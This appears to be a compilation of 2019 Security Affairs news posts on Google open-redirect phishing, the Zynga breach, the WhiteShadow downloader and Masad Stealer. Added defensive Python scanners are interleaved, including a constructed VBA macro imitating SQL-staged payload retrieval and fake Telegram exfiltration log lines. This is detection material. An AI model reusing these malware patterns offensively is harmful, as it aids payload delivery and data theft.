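For mail-filter and SOC use, the practical countermeasure is to reputation-check the destination a redirector carries rather than the trusted host it shows. The Python below is an added example, not code from the original post or from Google: it resolves the Google /url?q= form named above statically (no network request), follows chained redirector links, and flags a link whose visible host differs from where it lands. The table of redirector endpoints is deliberately limited to the form the article shows; the “url” parameter name and all test destinations are assumptions and constructed placeholders.

```python
from urllib.parse import urlsplit, parse_qs

# Known open-redirector endpoints and the query parameters that carry the
# destination. The Google /url?q= form is the one named in the article; the
# second parameter name is an assumption. Extend this table for other services.
REDIRECTORS = {
    ("google.com", "/url"): ("q", "url"),
}


def _host(url: str) -> str:
    """Lower-cased hostname without a leading 'www.' (empty if none)."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def redirect_target(url: str, table=REDIRECTORS):
    """Return the destination carried by a known redirector URL, else None.

    Purely static: the query string is parsed, nothing is fetched.
    """
    parts = urlsplit(url)
    params = table.get((_host(url), parts.path.rstrip("/") or "/"))
    if not params:
        return None
    qs = parse_qs(parts.query)
    for name in params:
        if qs.get(name) and qs[name][0]:
            dest = qs[name][0]
            if "://" not in dest:
                dest = "http://" + dest     # normalization choice for bare hosts
            return dest
    return None


def effective_destination(url: str, table=REDIRECTORS, max_hops: int = 5):
    """Follow chained redirector links; return (final_url, hops_followed)."""
    current, hops = url, 0
    while hops < max_hops:
        nxt = redirect_target(current, table)
        if nxt is None:
            break
        current, hops = nxt, hops + 1
    return current, hops


def looks_like_redirector_abuse(url: str, table=REDIRECTORS) -> bool:
    """True when the link shows a trusted redirector host but lands elsewhere.

    A filter should then evaluate the landing host, not the redirector.
    """
    final, hops = effective_destination(url, table)
    if hops == 0:
        return False
    shown, landed = _host(url), _host(final)
    return landed != shown and not landed.endswith("." + shown)


if __name__ == "__main__":
    # Constructed phishing-style link: trusted host, attacker-chosen destination.
    link = "https://www.google.com/url?q=https%3A%2F%2Flogin.example-phish.test%2Fsignin"
    print(effective_destination(link))
    print(looks_like_redirector_abuse(link))
```

A filter built on this resolves the landing host first and then applies its normal domain reputation checks to that host; the redirector host alone tells it nothing about risk.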

Pierluigi Paganini

(SecurityAffairs – google open redirects, phishing)



Security Affairs newsletter Round 233

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs



Hi folks, let me inform you that I have suspended the newsletter service; anyway, I’ll continue to provide you with a list of published posts every week through the blog.

Once again thank you!

0patch will provide micropatches for Windows 7 and Server 2008 after EoS
Critical flaws affect Jira Service Desk and Jira Service Desk Data Center
Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? What’s Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence’s report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attacks in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid on network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)


Security Affairs 2019-09-29 06:48:05

Hackers have stolen more than 218 million records from the popular ‘Words With Friends’ game developed by the mobile social game company Zynga Inc.

Do you remember Gnosticplayers? Between February and April, the well-known hacker disclosed the existence of several massive, previously unreported data breaches in five rounds, offering for sale almost a billion user records stolen from nearly 45 popular online services.

Now the Pakistani hacker claims to have stolen more than 218 million records from the popular mobile social game company Zynga Inc.

Zynga Inc. is an American social game developer founded in April 2007 that runs social video game services, primarily focused on mobile and social networking platforms.

Among the online games developed by the company, there are FarmVille, Words With Friends, Zynga Poker, Mafia Wars, and Café World that have over a billion players worldwide.

“Going by the online alias Gnosticplayers, the serial hacker told The Hacker News that this time, he managed to breach “Words With Friends,” a popular Zynga-developed word puzzle game, and unauthorisedly access a massive database of more than 218 million users.” reported The Hacker News.

Gnosticplayers shared a sample of the stolen data with The Hacker News; the exposed records include:

  • Names
  • Email addresses
  • Login IDs
  • Hashed passwords, SHA1 with salt
  • Password reset token (if ever requested)
  • Phone numbers (if provided)
  • Facebook ID (if connected)
  • Zynga account ID

Gnosticplayers revealed that he had access to data belonging to all Android and iOS game players who installed and signed up for the ‘Words With Friends’ game before 2nd September 2019.

Zynga confirmed that the account login information of certain players of Draw Something and Words With Friends may have been exposed in the data breach. The company pointed out that the hackers did not access financial information.

“We recently discovered that certain player account information may have been illegally accessed by outside hackers.  An investigation was immediately commenced, leading third-party forensics firms were retained to assist, and we have contacted law enforcement.” reads the data breach notification published by the company.

“While the investigation is ongoing, we do not believe any financial information was accessed.  However, we have identified account login information for certain players of Draw Something and Words With Friends that may have been accessed.  As a precaution, we have taken steps to protect these users’ accounts from invalid logins.  We plan to further notify players as the investigation proceeds.”

The hacker also claims to have accessed data of other Zynga gamers, including Draw Something and the discontinued OMGPOP game.

The company launched an investigation, hired third-party forensics firms to assist, and reported the incident to law enforcement. As a precaution, the gaming firm has taken steps to protect the affected users’ accounts from invalid logins.

Users of Words With Friends, and I would suggest players of all Zynga games, should immediately change their account password, as well as the password on any other service where they reuse the same credentials.

Pierluigi Paganini

(SecurityAffairs – gaming, hacking)


WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a downloader, dubbed WhiteShadow, that leverages Microsoft SQL queries to pull and deliver malicious payloads.

In August, malware researchers at Proofpoint spotted a new downloader being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros which collectively act as a staged downloader, and tracked them as WhiteShadow.

Initially the downloader was used in a small campaign distributing the Crimson RAT; over time, researchers observed the addition of detection-evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enabled, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by the threat actors.

The result of the query is written to disk as a PKZip archive of a Windows executable. 

“WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office.” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”
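The traits Proofpoint lists (an SQLOLEDB connection string, case-altered identifiers such as “rUN_pATH”, StrReverse-wrapped strings, long randomized identifiers) are all visible in the macro text, which makes them a natural target for static triage of incoming Office attachments. The Python below is an added example, not Proofpoint’s detection logic or any WhiteShadow code: it scans extracted VBA source for those traits, decodes the reversed literals so an analyst can read the real path, and combines SQL-retrieval indicators with obfuscation indicators into a verdict. The embedded macro fragment is constructed for the example and uses placeholder server and credential values.

```python
import re

# Constructed VBA fragment imitating the traits described in the report
# (SQLOLEDB connection, case-altered identifier, reversed path literal, long
# random identifier). It is not a real sample; host/credentials are placeholders.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim skjfhskfhksfhksfhksjfh1223sfsdf As Object
    Set skjfhskfhksfhksfhksjfh1223sfsdf = CreateObject("ADODB.Connection")
    skjfhskfhksfhksfhksjfh1223sfsdf.Open "Provider=SQLOLEDB;Data Source=SQL-HOST-PLACEHOLDER;User ID=sa;Password=PLACEHOLDER;"
    Dim rUN_pATH As String
    rUN_pATH = StrReverse("piz.Updates\stnemucoD\")
    Set rs = skjfhskfhksfhksfhksjfh1223sfsdf.Execute("SELECT payload FROM stage WHERE id=1")
End Sub
'''

# Indicators of the SQL-staged retrieval and of the obfuscation styles seen.
INDICATORS = {
    "sqloledb_connection": re.compile(r"Provider\s*=\s*SQLOLEDB", re.I),
    "adodb_object": re.compile(r"ADODB\.(Connection|Recordset)", re.I),
    "sql_query_in_macro": re.compile(r"\bSELECT\b.+\bFROM\b", re.I),
    "strreverse_literal": re.compile(r'StrReverse\s*\(\s*"([^"]*)"\s*\)', re.I),
    # Heuristic: identifiers of 25+ characters are rare in hand-written VBA.
    "random_identifier": re.compile(r"\b[A-Za-z_][A-Za-z0-9_]{24,}\b"),
}


def mixed_case_identifiers(text: str):
    """Identifiers like rUN_pATH: a lower-case letter followed by 2+ upper-case ones."""
    words = re.findall(r"\b[A-Za-z_][A-Za-z0-9_]*\b", text)
    return sorted({w for w in words if re.search(r"[a-z][A-Z]{2,}", w)})


def scan_macro(text: str) -> dict:
    """Return every indicator that fires, with de-duplicated matches."""
    hits = {}
    for name, rx in INDICATORS.items():
        found = sorted(set(rx.findall(text)))
        if found:
            hits[name] = found
    if "strreverse_literal" in hits:
        # Decode the reversed literals so the real string is readable.
        hits["strreverse_decoded"] = [s[::-1] for s in hits["strreverse_literal"]]
    mixed = mixed_case_identifiers(text)
    if mixed:
        hits["case_altered_identifiers"] = mixed
    return hits


def verdict(hits: dict) -> str:
    """SQL retrieval plus any obfuscation trait is the pattern described above."""
    retrieval = {"sqloledb_connection", "adodb_object", "sql_query_in_macro"} & hits.keys()
    obfuscation = {"strreverse_decoded", "case_altered_identifiers",
                   "random_identifier"} & hits.keys()
    if "sqloledb_connection" in hits and obfuscation:
        return "suspicious: SQL-staged download with obfuscation"
    if retrieval:
        return "review: macro connects to a SQL server"
    return "clean"


if __name__ == "__main__":
    result = scan_macro(SAMPLE_MACRO)
    for key, value in result.items():
        print(f"{key}: {value}")
    print(verdict(result))
```

Running this on macro source dumped from a document (for instance with an OLE/VBA extraction tool of your choice) gives an analyst the connection string, the decoded path, and the reason for the verdict in one pass.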


Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)


Masad Stealer Malware exfiltrates data via Telegram

Experts at Juniper Threat Labs have discovered a new piece of malware dubbed Masad Stealer that exfiltrates cryptocurrency wallet files via Telegram.

Security researchers at Juniper Threat Labs discovered a strain of malware dubbed Masad Stealer that is being actively distributed. The malware can steal files, browser information, and cryptocurrency wallet data and send them to the botmasters via a Telegram bot.

“The malware is being advertised on black market forums as “Masad Clipper and Stealer”. It steals browser data, which might contain usernames, passwords and credit card information. Masad Stealer also automatically replaces cryptocurrency wallets from the clipboard with its own.” reads the analysis published by the experts.

“Masad Stealer sends all of the information it collects – and receives commands from – a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers.”

Masad Stealer is written in AutoIt script and compiled into a Windows executable. Most of the samples analyzed by the experts were about 1.5 MiB in size, but the experts noted that larger executables bundled into other applications can also be found.

The malware appears to be linked to another threat dubbed “Qulab Stealer”. 

Crooks are advertising the malware on hacking forums as a stealer and clipper; the ‘fully-featured’ variant is offered for sale at $85.

Masad Stealer is distributed masquerading as a legitimate tool or bundled into third-party tools, such as CCleaner and ProxySwitcher.

Attackers attempt to trick users into downloading the malware by advertising it in forums, on third party download sites or on file sharing sites.

Victims can also be infected by installing tainted versions of popular software, game cracks, and cheats.

Once it infects a machine, Masad Stealer collects a wide range of data, including system information, screenshots, desktop text files, Steam Desktop Authenticator sessions, cryptocurrency wallets, browser cookies, usernames, passwords, and credit card data stored in browsers.

Masad Stealer is also able to automatically replace Monero, Bitcoin Cash, Litecoin, Neo, and Web Money cryptocurrency wallet addresses in the clipboard with its own.

The malware achieves persistence by creating a scheduled task on every Windows device it infects.

Once the malware has collected the information from the victim’s computer, it zips it using a 7zip executable bundled within its binary, then exfiltrates the data to the command and control (C2) server using unique Telegram bot IDs.

The analysis of the unique Telegram bot IDs and usernames associated with the malware allowed the experts to determine that there are at least 18 threat actors or campaigns actively targeting potential victims with Masad Stealer.

“Of the more than 1,000 samples we identified to be variants of this malware, there where 338 unique Telegram Command and Control bot IDs. From this data, we can estimate the number of threat actors –
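The same measure Juniper used, counting distinct Telegram bot IDs, also works on the defender’s side: every Bot API call carries the bot token in its URL path (https://api.telegram.org/bot<BOT_ID>:<SECRET>/<method>), so egress proxy logs from workstations that have no sanctioned Telegram bot reveal both the exfiltration and how many distinct operators are behind it. The Python below is an added example, not Juniper’s analysis code or anything from the malware: it parses constructed proxy log lines with placeholder bot IDs, groups calls by bot ID, counts distinct operators, and flags the bots that received file uploads (sendDocument and the other file-carrying methods of the public Bot API).

```python
import re
from collections import defaultdict

# Constructed web-proxy log lines; not real traffic. Bot IDs and tokens are
# made-up placeholders. Line 4 is ordinary Telegram web use and must not match.
SAMPLE_LOG = """\
2019-09-28T10:01:02Z host=WS-017 POST https://api.telegram.org/bot1111111111:AAPLACEHOLDERTOKENaaaaaaaaaaaaaaaaa/sendDocument 200
2019-09-28T10:01:05Z host=WS-017 GET https://api.telegram.org/bot1111111111:AAPLACEHOLDERTOKENaaaaaaaaaaaaaaaaa/getUpdates 200
2019-09-28T10:02:44Z host=WS-042 POST https://api.telegram.org/bot2222222222:BBPLACEHOLDERTOKENbbbbbbbbbbbbbbbbb/sendDocument 200
2019-09-28T10:03:10Z host=WS-099 GET https://web.telegram.org/ 200
2019-09-28T10:04:00Z host=WS-017 POST https://api.telegram.org/bot1111111111:AAPLACEHOLDERTOKENaaaaaaaaaaaaaaaaa/sendDocument 200
2019-09-28T10:05:21Z host=WS-120 POST https://api.telegram.org/bot3333333333:CCPLACEHOLDERTOKENccccccccccccccccc/sendMessage 200
"""

# Bot API URL: the numeric bot ID, a colon, the secret, then the method name.
BOT_CALL = re.compile(r"https://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(\w+)")
HOST_FIELD = re.compile(r"host=(\S+)")
# Bot API methods that carry a file; these are the exfiltration channel.
UPLOAD_METHODS = {"sendDocument", "sendPhoto", "sendVideo", "sendAudio"}


def parse_bot_calls(log_text: str):
    """Return a list of (internal_host, bot_id, method) for every Bot API call."""
    calls = []
    for line in log_text.splitlines():
        m = BOT_CALL.search(line)
        if not m:
            continue
        host = HOST_FIELD.search(line)
        calls.append((host.group(1) if host else "?", m.group(1), m.group(3)))
    return calls


def summarize(calls):
    """Group calls by bot ID: contacting hosts, total calls, file uploads."""
    by_bot = defaultdict(lambda: {"hosts": set(), "calls": 0, "uploads": 0})
    for host, bot_id, method in calls:
        rec = by_bot[bot_id]
        rec["hosts"].add(host)
        rec["calls"] += 1
        if method in UPLOAD_METHODS:
            rec["uploads"] += 1
    return dict(by_bot)


def distinct_operators(calls) -> int:
    """Number of distinct bot IDs, the proxy for distinct operators used above."""
    return len({bot_id for _, bot_id, _ in calls})


def flag_exfil(calls):
    """Bot IDs that received file uploads from a managed host (alert condition)."""
    return sorted(b for b, rec in summarize(calls).items() if rec["uploads"] > 0)


if __name__ == "__main__":
    calls = parse_bot_calls(SAMPLE_LOG)
    print("distinct bot IDs:", distinct_operators(calls))
    print("bots receiving uploads:", flag_exfil(calls))
    for bot_id, rec in summarize(calls).items():
        print(bot_id, sorted(rec["hosts"]), rec["calls"], "calls", rec["uploads"], "uploads")
```

On a real proxy export the useful alert is the upload-carrying call from a host with no business reason to run a Telegram bot; the per-bot grouping then tells the responder how many distinct operators and how many internal hosts are involved.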